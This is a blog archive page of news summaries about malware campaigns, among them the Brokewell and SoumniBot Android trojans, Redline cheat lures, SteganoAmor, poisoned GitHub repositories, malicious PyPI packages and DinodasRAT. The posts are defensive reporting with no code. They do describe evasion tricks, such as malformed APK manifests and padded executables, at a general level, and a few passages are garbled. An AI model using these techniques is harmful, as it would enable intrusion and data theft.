Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
malware
Banking Trojan Brokewell Browser Chrome Google malware

Banking Malware "Brokewell" Hacks Android Devices, Steals User Data

Banking Malware "Brokewell" Hacks Android Devices

Security experts have uncovered a new Android banking trojan called Brokewell, which can record every event on the device, from touches and information shown to text input and programs launched.

The malware is distributed via a fake Google Chrome update that appears while using the web browser. Brokewell is in ongoing development and offers a combination of broad device takeover and remote control capabilities.

Brokewell information

ThreatFabric researchers discovered Brokewell while examining a bogus Chrome update page that released a payload, which is a common approach for deceiving unwary users into installing malware.

Looking back at previous campaigns, the researchers discovered that Brokewell had previously been used to target "buy now, pay later" financial institutions (such as Klarna) while masquerading as an Austrian digital authentication tool named ID Austria.

Brokewell's key capabilities include data theft and remote control for attackers.

Data theft 

  • Involves mimicking login windows of targeted programs to steal passwords (overlay attacks).
  • Uses its own WebView to track and collect cookies once a user logs into a valid website.
  • Captures the victim's interactions with the device, such as taps, swipes, and text inputs, to steal data displayed or inputted on it.
  • Collects hardware and software information about the device.
  • Retrieves call logs.
  • determines the device's physical position.
  • Captures audio with the device's microphone.

Device Takeover: 

  • The attacker can see the device's screen in real time (screen streaming).
  • Remotely executes touch and swipe gestures on the infected device.
  • Allows remote clicking on specific screen components or coordinates.
  • Allows for remote scrolling within elements and text entry into specific fields.
  • Simulates physical button presses such as Back, Home, and Recents.
  • Remotely activates the device's screen, allowing you to capture any information.
  • Adjusts brightness and volume to zero.

New threat actor and loader

According to ThreatFabric, the developer of Brokewell is a guy who goes by the name Baron Samedit and has been providing tools for verifying stolen accounts for at least two years.

The researchers identified another tool named "Brokewell Android Loader," which was also developed by Samedit. The tool was housed on one of Brokewell's command and control servers and is utilized by several hackers.

Unexpectedly, this loader can circumvent the restrictions Google imposed in Android 13 and later to prevent misuse of the Accessibility Service for side-loaded programs (APKs).

This bypass has been a problem since mid-2022, and it became even more of a problem in late 2023 when dropper-as-a-service (DaaS) operations began offering it as part of their service, as well as malware incorporating the tactics into their bespoke loaders.

As Brokewell shows, loaders that circumvent constraints to prevent Accessibility Service access to APKs downloaded from suspicious sources are now ubiquitous and widely used in the wild.

Security experts warn that device control capabilities, like as those seen in the Brokewell banker for Android, are in high demand among cybercriminals because they allow them to commit fraud from the victim's device, avoiding fraud evaluation and detection technologies.

They anticipate Brokewell being further improved and distributed to other hackers via underground forums as part of a malware-as-a-service (MaaS) operation.

To avoid Android malware infections, avoid downloading apps or app updates from sources other than Google Play, and make sure Play Protect is always turned on.

Read more »
VPM
Child pornography Extortion Honeytrap malware VPM

Malware Author Lures Child Abusers Into Honeytrap to Extort Them

 

You rarely root for online criminals, but a new malware campaign targeting child exploiters does not make you feel awful about the victims. 

Since 2012, threat actors have developed a range of malware and ransomware that impersonate government agencies and earn affected Windows users that they are seeing CSAM. The software informs users that they must pay a "penalty" to keep their information from being transferred to law enforcement. 

One of the first "modern" ransomware operations, known as Anti-Child Porn Spam Protection or ACCDFISA, used this extortion strategy in conjunction with initially locking Windows systems and eventually encrypting files. 

Similar extortion techniques were used by cybersecurity researcher MalwareHunterTeam to share an executable malware sample named "CryptVPN" [VirusTotal] with BleepingComputer last week. This time, though, the malware creator is going after people who actively seek child pornography rather than innocent people. 

Security specialists investigated the malware and discovered that threat actors posed as UsenetClub, a subscription service that allows users to download films and images from Usenet with "uncensored" access.

Usenet is an online discussion platform that allows users to discuss different topics in "newsgroups" to which they have subscribed. While Usenet is used for valid discussion of a variety of topics, it is also a notorious source of child pornography.

Threat actors designed a fraudulent site pretending to be UsenetClub and offered three subscription tiers for the site's content. The first two were paid subscriptions, ranging from $69.99 per month to $279.99 annually. However, a third option claimed to allow free access if you install and employ the free "CryptVPN" software to access the site. 

Clicking the "Download & Install" button will download a CryptVPN.zip file from the website, which when unpacked will contain a Windows shortcut called "CLICK-HERE-TO-INSTALL". 

This file is a shortcut to the PowerShell.exe executable that downloads and saves the CryptVPN.exe executable to C:\Windows\Tasks.exe before executing it. The malware executable is packaged with UPX, however when unpacked, it contains a PDB string indicating that the creator titled the malware "PedoRansom". 

The malware does nothing uncharacteristic except change the target's wallpaper to an extortion demand and drop a ransom note named README.TXT on the desktop, which includes similar extortion demands. 

"You were searching for child exploitation and/or child sexual abuse material. You were stupid enough to get hacked," reads the extortion demand. "We have collected all your information, now you must pay us a ransom or your life is over.”

The extortion goes on to say that the victim must pay $500 to the bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl Bitcoin address within ten days or their identity will be leaked. Currently, this bitcoin address has only received roughly $86 in payments. 

Threat actors have long used "sextortion" strategies, such as sending bulk emails to a large number of people in an attempt to scare them into paying an extortion demand. 

These approaches worked very well at first, with spammers extorting more than $50,000 per week during the early operations. However, as time passes and the victims of these frauds become more aware, sextortion operations no longer yield the same money. 

While this strategy is more innovative and will scare many individuals looking for this type of stuff, we doubt many people will pay the extortion demand.
Read more »
malware
Credential Darknet Data Theft Kaspersky malware

Rise In Cybercrime: Dark Web Fueling Credential Attacks

 


In an unsettling situation, cybercriminals are increasingly turning to credential theft as a lucrative business, aided by the rise of infostealer malware attacks. Over the past three years, these threat actors have capitalised on the opportunity, compromising millions of personal and corporate devices globally.

The Rise of Infostealer Malware

According to cybersecurity experts at Kaspersky, infostealer malware attacks have surged sevenfold in recent years, with over 10 million devices compromised in 2022 alone. These sophisticated attacks enable hackers to silently collect login credentials and sensitive data from devices, posing a significant cybersecurity threat.

The Lucrative Market for Stolen Credentials

The value of corporate credentials in the cybercrime market has soared, leading to a 643% increase in data theft attacks. Cybercriminals act as initial access brokers, stealing corporate credentials and selling them on dark web forums for substantial profits. Kaspersky researchers highlight various sales models, with prices starting at $10 per log file.

Emerging Dark Web Hubs

Darknet markets have become key enablers of cybercrime, facilitating the sale of stolen credentials and victim profiles to cybercriminal groups. Following the takedown of Genesis Market, new hubs like Kraken Market and DNM Aggregator have emerged, offering seamless payment options via crypto processors.

Regional Impact

Regions like the Asia-Pacific and Latin America have been particularly affected by credential stealing attacks, with millions of credentials stolen from countries like Brazil, India, Colombia, and Vietnam. In Australia, compromised credentials accounted for the majority of cybersecurity incidents, with compromised or stolen credentials implicated in 56% of all incidents.

The Role of Initial Access Brokers

The number of initial access brokers (IABs) operating worldwide has risen significantly, with the APAC region experiencing a particularly sharp increase. These brokers play a critical role in fueling cybercrime operations, selling access to corporate networks and facilitating activities like ransomware attacks.

Despite the perception of cyberattacks as complex operations, the reality is that many exploit the simplicity of credential vulnerabilities. According to the Cybersecurity and Infrastructure Security Agency (CISA), over half of government and critical infrastructure attacks leverage valid credentials, with stolen credentials implicated in 86% of breaches involving web-based platforms. Credential stuffing, a technique where attackers use stolen usernames and passwords on various websites, has become increasingly popular due to individuals' tendency to reuse login information for convenience. 

With cybercriminals exploiting vulnerabilities in corporate and personal networks, organisations and individuals must remain a step ahead to protect against this pervasive threat.




Read more »
Threat Researchers
Cheat cryptocurrency Cyberattacks CyberCrime Cyberthreats GitHub Info-stealing JIT malware McAfee Passwords Threat Researchers

Information Stealer Malware Preys on Gamers via Deceptive Cheat Code Baits

 


There is a new info-stealing malware that appears as a cheat on a game called Cheat Lab, and it promises downloaders that if they convince their friends to download it too, they will receive a free copy. It is possible to harvest sensitive information from infected computers by using Redline malware, including passwords, cookies, autofill information, and cryptocurrency wallet information, which is one of the most powerful information-stealing malware programs. 

As a result of the malware's popularity among cybercriminals and its widespread distribution channels, it has become widespread. According to McAfee threat researchers, the new malware leverages Lua bytecode to evade detection. This makes it possible to inject malicious code into legitimate processes for stealth, while also benefiting from Just-In-Time compilations (JIT). 

Using a command and control server associated with the malware, the researchers link this variant to Redline, which has been linked to the malware for a long time. The tests BleepingComputer conducted revealed that the malware does not exhibit the typical behaviour associated with Redline, such as stealing browser information, saving passwords, and stealing cookies. 

Through a URL linked to Microsoft's 'vcpkg' GitHub repository, the malicious Redline payloads resemble demonstrations of cheating tools named "Cheat Lab" and "Cheater Pro". When the malware is executed, it unpacks two files, compiler.exe and lua51.dll, once the MSI installer is installed.  The malicious Lua bytecode is also dropped in a file called 'readme.txt'. 

The campaign uses an interesting lure to spread the malware even further by telling victims that if they convince their friends to install the cheating program, they will receive a free, fully licensed copy of the cheating program. As an added layer of legitimacy, the malware payload is distributed in the form of an uncompiled bytecode rather than an executable to avoid detection. 

To make sure that the malware is not detected, it comes in the form of an activation key included. Upon installation of the compiler.exe program, Lua bytecode is compiled and executed by it, and it also creates scheduled tasks that execute during system startup when the program is installed. The same executable also sets up persistence by creating scheduled tasks. 

McAfee reports that a fallback mechanism is used by the malware to persist the three files, copying them to a long random path under the program directory that the malware is active on the infected system, it will communicate with a C2 server and send screenshots and system information to the server, then wait for commands to be executed by the server on the host system. 

Even though it is unknown exactly how information thieves first infect computers, they are typically spread through malvertising, YouTube video descriptions, P2P downloads, and deceptive software download sites that can lead to infection. The Redline virus is a highly dangerous one, which is why users are urged not to use unsigned executables or download files from unreliable websites. 

As a result of this atta seemingly trustworthy programs, such as those found on Microsoft's GitHub, are at risk of infection by the Even though BleepingComputer contacted Microsoft about the executables that were distributed via its GitHub URLs, the company had not respond to the publication date.
Read more »
virus
Android Bugs malware Soumnibot virus

Soumnibot Malware Abuses Bugs to Escape Detection


Soumnibot Malware

A new Android banking virus called 'SoumniBot' employs a less prevalent obfuscation technique, attacking flaws in the Android manifest extraction and parsing method.

The approach allows SoumniBot to bypass typical Android security safeguards and steal information.
Kaspersky researchers found and researched the virus, providing technical details on how it exploits the Android procedure to parse and extract APK manifests.

Fooling Android’s Parser

Manifest files ('AndroidManifest.xml') are located in each app's root directory and contain information about components (services, broadcast receivers, content providers), permissions, and app data.

While malicious APKs can employ multiple compression strategies to confuse security programs and elude inspection, Kaspersky analysts discovered that SoumniBot uses three separate methods to bypass parser tests, all of which entail manipulating the manifest file's compression and size.

How the virus works?

First, while unpacking the APK's manifest file, SoumniBot utilizes an erroneous compression number that differs from the normal values (0 or 8) anticipated by the Android 'libziparchive' library assigned to the role.

Rather than rejecting these numbers, the Android APK parser defaults to accepting the data as uncompressed due to a flaw, allowing the APK to evade protection and keep executing on the device.

The second way includes misreporting the size of the manifest file in the APK, providing a value that is greater than the true figure.

Since the file was tagged as uncompressed in the previous step, it is copied directly from the archive, with rubbish "overlay" data filling in the gaps.

According to Kaspersky, while this extra data does not immediately affect the device because Android is configured to disregard it, it does play an important role in misleading code analysis tools.

The third evasion tactic is to use excessively long strings as the names of XML namespaces in the manifest file, making it impossible for automated analysis tools to examine them, as they frequently lack enough capacity to parse them.

Google has been notified by Kaspersky that APK Analyzer, the official analysis tool for Android, cannot handle files that use the aforementioned evasion techniques.

The danger of SoumniBots

At the moment of activation, SoumniBot communicates the infected device's carrier, number, and other profile information, and asks its configuration options from a hardcoded server address.

Next, it creates a malicious service that sends stolen data from the victim every 15 seconds and restarts every 16 minutes if it is interrupted.

IP addresses, contact lists, account information, SMS messages, images, videos, and digital certificates for online banking are among the exfiltrated data.

The techniques by which SoumniBot infiltrates smartphones are unknown, however, they could range from distribution through dubious websites and unofficial Android marketplaces to upgrading legitimate programs in trustworthy repositories with malicious code.

Kaspersky offers a concise collection of compromise indications, comprising malware hashes and two domains utilized by malware operators for command and control operations.

Read more »
TA558
Data Privacy malware Microsoft Office Steganography TA558

New SteganoAmor Attacks Employ Steganography to Target Organizations Globally

 


An exposé has brought to light an intricate operation engineered by the TA558 hacking group, known for its previous focus on the hospitality and tourism sectors. This new offensive, dubbed "SteganoAmor," employs steganography, a technique of concealing malicious code within seemingly harmless image files, to infiltrate targeted systems worldwide. Positive Technologies, the cybersecurity firm behind the discovery, has identified over 320 instances of this attack affecting various organisations across different sectors and countries.


How SteganoAmor Attacks Work

SteganoAmor attacks start with sneaky emails that look harmless but contain files like Excel or Word documents. These files take advantage of a weakness in Microsoft Office called CVE-2017-11882, which was fixed in 2017. When someone opens these files, they unknowingly download a Visual Basic Script (VBS) from a source that seems real. This script then fetches an image file (JPG) that hides a secret payload encoded in base64 format.


Diverse Malware Payloads

The hidden payload serves as a gateway to various malware families, each with distinct functionalities:

1. AgentTesla: A spyware capable of keylogging, credential theft, and capturing screenshots.

2. FormBook: An infostealer malware adept at harvesting credentials, monitoring keystrokes, and executing downloaded files.

3. Remcos: A remote access tool enabling attackers to manage compromised machines remotely, including activating webcams and microphones.

4. LokiBot: Another infostealer focusing on extracting sensitive information from commonly used applications.

5. Guloader: It serves as a downloader in cyberattacks, distributing secondary payloads to evade antivirus detection.

6. Snake Keylogger: Snake Keylogger is malware designed to steal data by logging keystrokes, capturing screenshots, and harvesting credentials from web browsers.

7. XWorm : It functions as a Remote Access Trojan (RAT), granting attackers remote control over compromised computers for executing commands and accessing sensitive information.


To evade detection, the final payloads and malicious scripts are often stored in reputable cloud services like Google Drive. Additionally, stolen data is transmitted to compromised FTP servers, masquerading as normal traffic.


Protective Measures

Despite the complexity of the attack, safeguarding against SteganoAmor is relatively straightforward. Updating Microsoft Office to the latest version eliminates the vulnerability exploited by the attackers, rendering their tactics ineffective.


Global Impact

While the primary targets seem concentrated in Latin America, the reach of SteganoAmor extends worldwide, posing a significant threat to organisations globally.


As these threats are taking new shape and form, staying aware and implementing timely updates remain crucial defences against cyber threats of any capacity. 


Read more »
Threat Landscape
GitHub Malicious Payload malware Repository Scanning Threat Landscape

Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to Keyzetsu clipper that targets crypto wallets. The malware is installed continuously on Windows machines and is scheduled to be executed daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to an executable file shortcut is one way that malware tries to remain persistent. Several malicious repositories have received complaints from infected users, suggesting that Checkmarx's effort has been successful. 

In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.
Read more »
malware
Cyberattacks CyberCrime Cyberhacks Cybersecurity CyberThreat GDP Mac malware

Counting the Cost: $9.2 Trillion Annual Impact of Cybercrime Looms

 


According to a new Statista Market Insights report, cybercrime is rising at an unprecedented pace. Approximately one-third of the United States' GDP or about 24 times Apple's annual revenue in 2023 will be incurred as a result of cyberattacks, according to a new survey from Statista Market Insights. A similar study from Statista Market Insights found that cybercrime costs have risen by 245% between 2018 and 2020, increasing from $860 billion to $2.95 trillion. 

With the spread of the pandemic, the cost of health care has more than doubled to $5.49 trillion in 2021 and is expected to increase by $1 trillion annually in 2023 to $8.15 trillion. In addition to impacting businesses and governments, cybercrime has become one of the world's largest illegal economies, as well as the everyday people of the world. Cyberattacks are known for causing financial losses such as ransom payments, loss of productivity, system downtime and data theft, among others. 

Contributing factors In terms of attack surfaces, IoT devices are providing cybercriminals with an increasingly large attack surface, increasing the number of potential victims and supplying them with a more relevant attack surface over time. There is no reason for Mac users to be excluded from this. There was an increase of 50% in new Mac malware families in 2023 in Jamf's report. 

The number of instances of malware that can be found within each of these families could be hundreds. With the growing number of users of Macs, cybercriminals are more and more interested in targeting it as an easy target. It is important to keep in mind that geopolitics plays a significant role in cyberattacks as many countries use them for strategic advantage, disruption of critical infrastructure, and intelligence gathering.

A heightened escalation in the number of state-sponsored attacks is taking place as a result of the conflict between Ukraine and Israel. A significant number of cybersecurity jobs have gone unfilled as a result of the skills shortage we're going through today. Due to this shortage, many cybersecurity positions have gone unfilled. It will therefore be more difficult to monitor and defend against specific threats as there will be fewer professionals. 

Moreover, the shortage of skilled professionals can also increase the workload for employees who are already working, so that productivity can be negatively impacted. Further to this, employees are burned out as a result of their jobs. Threat actors count on this. In the world of ransomware-as-a-service (RaaS), there are very few barriers to entry, and this has made it very popular thanks to a combination of tough economic factors, swift financial gains, and little technical knowledge. 

Operators develop the software under this model and affiliates pay to use pre-built tools and packages to launch attacks on the network. Each affiliate pays a fee for each attack they launch. A ransomware attack can be carried out by non-programmers lacking the skills to develop and deploy their ransomware. 

There is no shortage of RaaS kits available on the dark web, but they aren't always the best. Due to a simple lack of awareness, the risks and consequences associated with cyberattacks remain undetected by many individuals and organizations, making them vulnerable to cybercrime. It was found that 40% of Jamf's mobile users and 39% of the organizations in their annual trends report are running on a device that is known to have vulnerabilities, according to the report.

In light of recent incidents regarding a popular Apple device management platform, it has become evident that there remains a notable lack of awareness concerning the security measures necessary to protect Mac devices. Ensuring the security of the Mac is imperative in safeguarding against potential threats such as malware and phishing attacks. Here are some essential steps to bolster the security of the Mac: 

1. Keep the device up-to-date: It is crucial to regularly update the Mac's operating system to incorporate the latest security patches. By staying current with updates, users can effectively address known vulnerabilities that may be exploited by malware.

2. Utilize antivirus software: Despite common misconceptions, Macs are not impervious to malware. Therefore, employing reputable antivirus software is highly recommended. Tools such as Malwarebytes offer free applications for individual users, capable of detecting and removing potential threats. Additionally, MacPaw’s CleanMyMac X now features a malware removal tool powered by MoonLock, enhancing protection against malicious software. 

3. Exercise caution when clicking: Email remains a primary vector for malware distribution, with phishing attacks experiencing a significant rise in success rates. According to recent reports, phishing success rates increased from 1% in 2022 to 9% in 2023. Hence, exercising caution and scepticism when interacting with email links and attachments is essential to mitigate the risk of falling victim to such attacks. 

4. Enable a firewall: Enabling the built-in firewall on the Mac is an effective measure to prevent the acceptance of unauthorized connections and services. By managing both incoming and outgoing connections, the firewall helps fortify the device's defences against potential threats. 

5. Use strong, unique passwords: Employing robust and distinctive passwords is imperative for bolstering the security of the Mac. Avoid using easily guessable passwords, such as common phrases or pet names followed by predictable characters. Instead, opt for complex combinations of letters, numbers, and symbols to enhance password strength and resilience against unauthorized access. 

6. Enable disk encryption: Leveraging features such as FileVault, which encrypts all user data stored on the disk in real-time, enhances the security of sensitive information on the Mac. In the event of device loss or theft, disk encryption ensures that the data remains inaccessible to unauthorized individuals, thereby safeguarding privacy and confidentiality. 

7. Limit user privileges: Restricting user privileges is crucial in preventing unauthorized software installations and minimizing the potential impact of malware infections. By limiting user permissions, users can effectively mitigate the risks associated with malicious activities and enhance overall device security. 

In summary, prioritizing the implementation of robust security measures is paramount in safeguarding the Mac against evolving threats. By adopting proactive strategies such as keeping the device updated, utilizing antivirus software, exercising caution when interacting with emails, enabling firewalls, employing strong passwords, enabling disk encryption, and limiting user privileges, users can significantly enhance the security posture of the Mac and protect against potential vulnerabilities and cyber threats.
Read more »
X
malware Netflix phishing URLs Websites X

X's URL Blunder Sparks Security Concerns

 



X, the social media platform formerly known as Twitter, recently grappled with a significant security flaw within its iOS app. The issue involved an automatic alteration of Twitter.com links to X.com links within Xeets, causing widespread concern among users. While the intention behind this change was to maintain brand consistency, the execution resulted in potential security vulnerabilities.

The flaw originated from a feature that indiscriminately replaced any instance of "Twitter" in a URL with "X," regardless of its context. This meant that legitimate URLs containing the word "Twitter" were also affected, leading to situations where users unknowingly promoted malicious websites. For example, a seemingly harmless link like netflitwitter[.]com would be displayed as Netflix.com but actually redirect users to a potentially harmful site.

The implications of this flaw were significant, as it could have facilitated phishing campaigns or distributed malware under the guise of reputable brands such as Netflix or Roblox. Despite the severity of the issue, X chose not to address it publicly, likely in an attempt to mitigate negative attention.

The glitch persisted for at least nine hours, possibly longer, before it was eventually rectified. Subsequent tests confirmed that URLs are now displaying correctly, indicating that the issue has been resolved. However, it's important to note that the auto-change policy does not apply when the domain is written in all caps.

This incident underscores the importance of thorough testing and quality assurance in software development, particularly for platforms with large user bases. It serves as a reminder for users to exercise caution when clicking on links, even if they appear to be from trusted sources.

To better understand how platforms like X operate and maintain user trust, it's essential to consider the broader context of content personalization. Profiles on X are utilised to tailor content presentation, potentially reordering material to better match individual interests. This customization considers users' activity across various platforms, reflecting their interests and characteristics. While content personalization enhances user experience, incidents like the recent security flaw highlight the importance of balancing personalization with user privacy and security concerns.


Read more »
Vulture
Cybersecurity Threats Digital Hygiene Financial Security malware Vulture

The Vulture in Cyberspace: A Threat to Your Finances


In the digital landscape where information flows freely and transactions occur at the speed of light, a new predator has emerged. Aptly named the “Vulture,” this cyber threat silently circles its unsuspecting prey, waiting for the right moment to strike. Its target? Your hard-earned money, nestled securely within your bank account.

The Anatomy of the Vulture

The Vulture is not a physical bird of prey; it’s a sophisticated malware strain that infiltrates financial systems with surgical precision. Unlike its noisy counterparts, this digital menace operates silently, evading detection until it’s too late. Let’s dissect its anatomy:

Infiltration: The Vulture gains access through phishing emails, compromised websites, or infected software updates. Once inside, it nests within your device, waiting for the opportune moment.

Observation: Like a patient hunter, the Vulture observes your financial behavior. It tracks your transactions, monitors your balance, and studies your spending patterns. It knows when you receive your paycheck, pay bills, or indulge in online shopping.

Precision Attacks: When the time is right, the Vulture strikes. It initiates fraudulent transactions, transfers funds to offshore accounts, or even empties your entire balance. Its precision is chilling—no clumsy mistakes, just calculated theft.

The Revelation

The recent exposé by The Economic Times sheds light on the Vulture’s activities. According to cybersecurity researchers, this malware strain has targeted thousands of unsuspecting victims worldwide. Its modus operandi is both ingenious and terrifying:

Social Engineering: The Vulture exploits human vulnerabilities. It sends seemingly innocuous emails, masquerading as legitimate institutions. Clicking on a harmless-looking link is all it takes for the Vulture to infiltrate.

Zero-Day Vulnerabilities: The malware exploits unpatched software vulnerabilities. It thrives on the negligence of users who delay updates or ignore security warnings.

Money Mule Networks: The stolen funds don’t vanish into thin air. The Vulture employs intricate money mule networks—a web of unwitting accomplices who launder the money across borders.

Protecting Your Nest Egg

Fear not; there are ways to shield your finances from the Vulture’s talons:

Vigilance: Be wary of unsolicited emails, especially those requesting sensitive information. Verify the sender’s authenticity before clicking any links.

Software Updates: Regularly update your operating system, browsers, and security software. Patch those vulnerabilities before the Vulture exploits them.

Two-Factor Authentication: Enable two-factor authentication for your online accounts. Even if the Vulture cracks your password, it won’t get far without the second factor.

Monitor Your Accounts: Keep a hawk eye on your bank statements. Report any suspicious activity promptly.

Moving Ahead

The Vulture may be cunning, but we can outsmart it. By staying informed, adopting best practices, and maintaining digital hygiene, we can protect our nest eggs from this relentless predator. Remember, in cyberspace, vigilance is our armor, and knowledge is our shield

Read more »
Threat actor
Commonwealth of Independent States Cybersecurity Dark Web Exfiltration Lazy Koala malware password stealer malware Phishing Attacks PT ESC Telegram Threat actor

Lazy Koala: New Cyber Threat Emerges in CIS Region

 

Cybersecurity researchers at Positive Technologies Expert Security Center (PT ESC) recently uncovered a new threat actor they've named Lazy Koala. Despite lacking sophistication, this group has managed to achieve significant results.

The report reveals that Lazy Koala is targeting enterprises primarily in Russia and six other Commonwealth of Independent States countries: Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. Their victims belong to government agencies, financial institutions, and educational establishments. Their primary aim is to acquire login credentials for various services.

According to the researchers, nearly 900 accounts have been compromised so far. The purpose behind the stolen information remains unclear, but it's suspected that it may either be sold on the dark web or utilized in more severe subsequent attacks.

The modus operandi of Lazy Koala involves simple yet effective tactics. They employ convincing phishing attacks, often using native languages to lure victims into downloading and executing attachments. These attachments contain a basic password-stealing malware. The stolen files are then exfiltrated through Telegram bots, with the individual managing these bots being dubbed Koala, hence the group's name.

Denis Kuvshinov, Head of Threat Analysis at PT ESC, describes Lazy Koala's approach as "harder doesn't mean better." Despite their avoidance of complex tools and tactics, they manage to accomplish their objectives. Once the malware establishes itself on a device, it utilizes Telegram, a preferred tool among attackers, to exfiltrate stolen data.

PT ESC has notified the victims of these attacks, warning that the stolen information is likely to be sold on the dark web.
Read more »
Youtube
Cheatcodes LummaC2 malware malware Piracy Software Updates Youtube

Are YouTube Game Cracks Hiding Malware?


Recently, cybersecurity researchers have unearthed a disturbing trend: threat actors are exploiting YouTube to distribute malware disguised as video game cracks. This alarming course of action poses a significant risk to unsuspecting users, especially those seeking free software downloads.

According to findings by Proofpoint Emerging Threats, cybercriminals are leveraging popular video-sharing platforms to target home users, who often lack the robust defences of corporate networks. The plan of action involves creating deceptive videos offering free access to software and video game enhancements, but the links provided lead to malicious content.

The malware, including variants such as Vidar, StealC, and Lumma Stealer, is camouflaged within seemingly innocuous downloads, enticing users with promises of game cheats or software upgrades. What's particularly troubling is the deliberate targeting of younger audiences, with malicious content masquerading as enhancements for games popular among children.

The investigation uncovered several compromised YouTube accounts, with previously dormant channels suddenly flooded with English-language videos promoting cracked software. These videos, uploaded within a short timeframe, contained links to malware-infected files hosted on platforms like MediaFire and Discord.

One example highlighted by researchers featured a video claiming to enhance a popular game, accompanied by a MediaFire link leading to a password-protected file harbouring Vidar Stealer malware. Similarly, other videos promised clean files but included instructions on disabling antivirus software, further endangering unsuspecting users.

Moreover, cybercriminals exploited the identity of "Empress," a well-known entity within software piracy communities, to disseminate malware disguised as cracked game content. Visual cues provided within the videos streamlined the process of installing Vidar Stealer malware, presenting it as authentic game modifications.

Analysis of the malware revealed a common tactic of bloating file sizes to evade detection, with payloads expanding to approximately 800 MB. Furthermore, the malware utilised social media platforms like Telegram and Discord for command and control (C2) activities, complicating detection efforts.

Research into the matter has again enunciated the need for heightened awareness among users, particularly regarding suspicious online content promising free software or game cheats. While YouTube has been proactive in removing reported malicious accounts, the threat remains pervasive, targeting non-enterprise users vulnerable to deceptive tactics.

As cybercriminals continue to exacerbate their methods, it's imperative for individuals to exercise caution when downloading software from unverified sources. Staying informed about emerging threats and adopting cybersecurity best practices can help combat the risk of falling victim to such schemes.


Read more »
XDealer
DinodasRat Linux malware Robust security XDealer

Linux Servers Targeted by DinodasRAT Malware




Recently, cybersecurity experts have noticed a concerning threat to Linux servers worldwide. Known as DinodasRAT (also referred to as XDealer), this malicious software has been identified targeting systems running Red Hat and Ubuntu operating systems. The campaign, suspected to have been operational since 2022, signifies a growing concern for server security.

While the Linux variant of DinodasRAT has been detected, details about its operation remain limited. However, previous versions have been traced back to 2021, indicating a persistent threat. Notably, DinodasRAT has previously targeted Windows systems in a campaign dubbed 'Operation Jacana,' focusing on governmental entities.

Trend Micro reported on the activities of a Chinese APT group identified as 'Earth Krahang,' utilising XDealer to breach both Windows and Linux systems of governmental organisations globally. This revelation underlines the severity and scope of the threat posed by DinodasRAT.

According to insights provided by Kaspersky researchers, the Linux version of DinodasRAT exhibits sophisticated behaviour upon execution. It establishes persistence on the infected device through SystemV or SystemD startup scripts and creates a hidden file acting as a mutex to prevent multiple instances from running simultaneously. Furthermore, the malware communicates with a command and control (C2) server via TCP or UDP, ensuring secure data exchange through encryption algorithms.

DinodasRAT possesses a range of capabilities designed to monitor, control, and exfiltrate data from compromised systems. These include tracking user activities, executing commands from the C2 server, managing processes and services, offering remote access to the attacker, proxying communications, downloading updates, and self-uninstallation to erase traces of its presence.

Kaspersky researchers emphasise that DinodasRAT provides threat actors with complete control over compromised systems, enabling data exfiltration and espionage. The malware primarily targets Linux servers, with affected victims identified in China, Taiwan, Turkey, and Uzbekistan since October 2023.

Despite the severity of the threat, details regarding the initial infection method remain undisclosed. Nevertheless, the sudden rise of DinodasRAT underscores the insistence on robust cybersecurity measures, especially for organisations relying on Linux servers for critical operations.

As cybersecurity experts continue to monitor and analyse this surge in upcoming threats, proactive measures such as regular system updates, network monitoring, and employee training on security best practices become increasingly crucial in safeguarding against sophisticated threats like DinodasRAT. 


Read more »
suspension
combat malware Malware Campaign new user registration PyPI suspension

PyPI Halts New User Registrations to Combat Malware Campaign

 

The Python Package Index (PyPI) has implemented a temporary halt on user registrations and the creation of new projects due to an ongoing malware scheme. PyPI serves as a central hub for Python projects, aiding developers in discovering and installing Python packages.

With a vast array of packages available, PyPI becomes an attractive target for malicious actors who often upload counterfeit or fraudulent packages, posing risks to software developers and potentially initiating supply-chain attacks. Consequently, PyPI administrators recently announced the suspension of new user registrations to address this malicious activity.

According to a report by Checkmarx, cyber threat actors began uploading 365 packages to PyPI, masquerading as legitimate projects. These packages contain malicious code within their 'setup.py' files, which triggers upon installation, attempting to retrieve additional harmful payloads from remote servers.

To avoid detection, the malicious code encrypts using the Fernet module, with the remote server's URL dynamically generated as required. The ultimate payload includes an information-stealing mechanism with persistent capabilities, targeting data stored in web browsers such as login credentials, cookies, and cryptocurrency extensions.

Checkmarx has published a comprehensive list of identified malicious entries, featuring numerous typosquatting variants of genuine packages. However, Check Point researchers reveal that the list of malicious packages exceeds 500 and was deployed in two phases. Each package originated from unique maintainer accounts with distinct names and email addresses.

The researchers note that each maintainer account uploaded only one package, suggesting the use of automation in orchestrating the attack. All entries shared the same version number, contained identical malicious code, and displayed randomly generated names.

This incident underscores the critical importance for software developers and package maintainers to rigorously verify the authenticity and security of components sourced from open-source repositories. Notably, this is not the first time PyPI has taken aggressive measures to protect its community from malicious submissions. Similar actions were taken on May 20 last year.
Read more »
